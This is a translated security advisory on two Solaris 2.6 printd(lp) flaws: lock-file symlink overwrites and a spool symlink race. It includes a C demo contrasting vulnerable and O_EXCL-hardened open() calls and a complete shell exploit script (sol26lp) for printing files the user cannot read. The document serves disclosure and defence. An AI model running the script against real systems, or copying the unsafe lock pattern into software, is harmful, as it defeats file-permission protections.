printd(lp) vulnerability
Author: Silicosis. Compiled, tested and translated into Chinese by 小鱼儿 (littlefish@siom .com)
Summary: a flaw in printd(lp) on Solaris 2.6 lets an ordinary user create or overwrite privileged files, and print files that the user is not otherwise allowed to read.
1. Creating/overwriting privileged files:
Sun has not learned from its past mistakes: temp files are still a problem. When a large file is queued for printing, a lock file (/tmp/.printd.lock) is created. If, before you print, you create that lock path as a symlink pointing at the file you want created or overwritten, printd follows the link when it opens the lock file, and you end up with that file created or overwritten for you.
When the print job completes, the file you pointed the link at has mode 640 and contains printd's process identifier.
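The following is an added example, not code from the advisory or from Sun's printd: a small C program that replays the lock-file symlink attack described above in a scratch directory, with the unsafe open(2) pattern the advisory implies beside its hardened form. The scratch directory under /tmp, the victim file and its contents are constructed for the demonstration, and the function names (create_lock_unsafe, create_lock_safe, run_demo) are this example's own.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Write our pid into an already-open lock file, as printd does. */
static int write_pid(int fd)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    return write(fd, buf, (size_t)n) == n ? 0 : -1;
}

/* Vulnerable pattern (the behaviour the advisory describes): open(2)
 * follows a symlink planted at the lock path, so a privileged daemon
 * creates or truncates whatever the attacker pointed the link at. */
int create_lock_unsafe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0640);
    if (fd < 0)
        return -1;
    int rc = write_pid(fd);
    close(fd);
    return rc;
}

/* Hardened pattern: with O_EXCL, open(2) fails with EEXIST if anything,
 * a symlink included, already sits at the path, so a planted link is
 * never followed. */
int create_lock_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0640);
    if (fd < 0)
        return -1;
    int rc = write_pid(fd);
    close(fd);
    return rc;
}

/* 1 if the file's contents differ from expected, 0 if unchanged, -1 if unreadable. */
static int content_changed(const char *path, const char *expected)
{
    char buf[128];
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return strcmp(buf, expected) != 0;
}

static void write_text(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (f) { fputs(text, f); fclose(f); }
}

/* Replays the attack in a scratch directory: the attacker links the lock
 * path to a target, then the "daemon" creates its lock. Returns 0 when the
 * unsafe variant overwrote an existing target and created a new one through
 * a dangling link, while the safe variant refused both and still works when
 * no link is planted. Any other value is a bitmask of the checks that failed. */
int run_demo(void)
{
    char dir[] = "/tmp/printd-lock-demo-XXXXXX";   /* constructed scratch dir */
    if (!mkdtemp(dir))
        return -1;
    char victim[300], newfile[300], lock[300];
    snprintf(victim, sizeof victim, "%s/victim.conf", dir);
    snprintf(newfile, sizeof newfile, "%s/not-yet-there", dir);
    snprintf(lock, sizeof lock, "%s/.printd.lock", dir);
    const char *orig = "sample privileged content\n";   /* constructed */
    int result = 0;

    /* Overwrite case: .printd.lock -> existing victim file. */
    write_text(victim, orig);
    symlink(victim, lock);
    if (create_lock_unsafe(lock) != 0 || content_changed(victim, orig) != 1)
        result |= 1;
    write_text(victim, orig);                           /* restore; link stays */
    errno = 0;
    if (create_lock_safe(lock) != -1 || errno != EEXIST || content_changed(victim, orig) != 0)
        result |= 2;
    unlink(lock);

    /* Create case: .printd.lock -> path that does not exist yet. */
    symlink(newfile, lock);
    if (create_lock_unsafe(lock) != 0 || access(newfile, F_OK) != 0)
        result |= 4;
    unlink(newfile);
    errno = 0;
    if (create_lock_safe(lock) != -1 || errno != EEXIST || access(newfile, F_OK) == 0)
        result |= 8;
    unlink(lock);

    /* No link planted: the hardened version creates the lock normally. */
    if (create_lock_safe(lock) != 0 || content_changed(lock, "") != 1)
        result |= 16;

    unlink(lock); unlink(victim); rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_demo();
    printf("result %d (0 = unsafe variant exploited, safe variant refused)\n", r);
    return r != 0;
}
```

The fix is the O_EXCL flag alone: POSIX requires open() with O_CREAT|O_EXCL to fail with EEXIST when the path is a symlink, whatever the link points at, so the daemon never creates or truncates through an attacker's link. A daemon that must also tolerate a stale lock of its own should unlink it and retry rather than fall back to O_TRUNC.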
2. Printing files you are not allowed to read:
Sun rewrote its print spooler in Solaris 2.6 and adopted a sendmail-style queue system: each job gets a control file (cf*), a transfer file (xf*) and a data file (df*) under /var/spool/print.
[~]lp .tcshrc
[~]ls -al /var/spool/print
total 12
drwxr-xr-x   2 root     lp           512 Feb 20 12:44 .
drwxrwxr-x  10 root     bin          512 Feb 17 11:28 ..
-rw-rw-r--   1 root     staff          4 Feb 20 12:44 .seq
-rw-r-----   1 root     staff         80 Feb 20 12:44 cfA037core
lrwxrwxrwx   1 root     staff         19 Feb 20 12:44 dfA037core -> /home/sili/.tcshrc
-rw-r-----   1 root     staff         23 Feb 20 12:44 xfA037core

You have your control, transfer and data files. The data file is just a symlink to the file you printed, so if you replace the file you printed with a symlink to another file *before* the queue is flushed, printd will open and print that other file instead, even one you could not read yourself.
Below is the script used to test for this vulnerability:
----[CUT HERE: sol26lp]----
#!/bin/sh
#
# Print unreadable files on solaris2.6
# [email protected]
#
# --If it didn't work, change $BIGFILE to
#   something bigger.
#
# --Script usually works 80% of the time..
#   Didn't work? Try again.. Throw something
#   at the printspooler to slow it down.
#

# File we queue for printing; once queued it is swapped for a symlink to
# the target. It must be large so that the job sits in the queue long enough.
TMPFILE="./.dmlr"
BIGFILE="/usr/lib/libc.so.1"

if [ $# != 1 ]; then
  echo "Usage:"
  echo
  echo "./sol26lp <file>"
  echo
  echo "Print unreadable files on Solaris2.6"
  echo "                 [email protected]"
  exit 1
fi

echo "Need a large file to print, using $BIGFILE."
cp "$BIGFILE" "$TMPFILE" ; chmod 700 "$TMPFILE"
lp "$TMPFILE" ; #sleep 1;

# The race: the spooler's dfA* entry is a symlink to $TMPFILE, so replacing
# $TMPFILE with a link to the target makes printd open the target instead.
rm "$TMPFILE" ; ln -s "$1" "$TMPFILE"

# Find the queue entry whose symlink points at our temp file.
QF=`ls -al /var/spool/print | grep "$TMPFILE" | awk '{print $9}'`
echo "Queue File: /var/spool/print/$QF"

# The queue entry disappears once the job has been printed.
while [ -h "/var/spool/print/$QF" ]; do
  echo "Waiting for file to print"
  sleep 1
done

echo "File printed. Erasing temp files."
rm "$TMPFILE"
echo "Done."
echo
echo "                 [email protected] 1/20/98"
----[CUT HERE: sol26lp]----
This article was compiled or written by isbase members; if you repost it, please keep it intact. Visit our site at http://www.isbase.com. 绿色兵团 (Green Army) gives you security assurance.
※ Source: NetEase Virtual Community, Beijing site http://bj.netease.com [FROM: 202.106.246.198]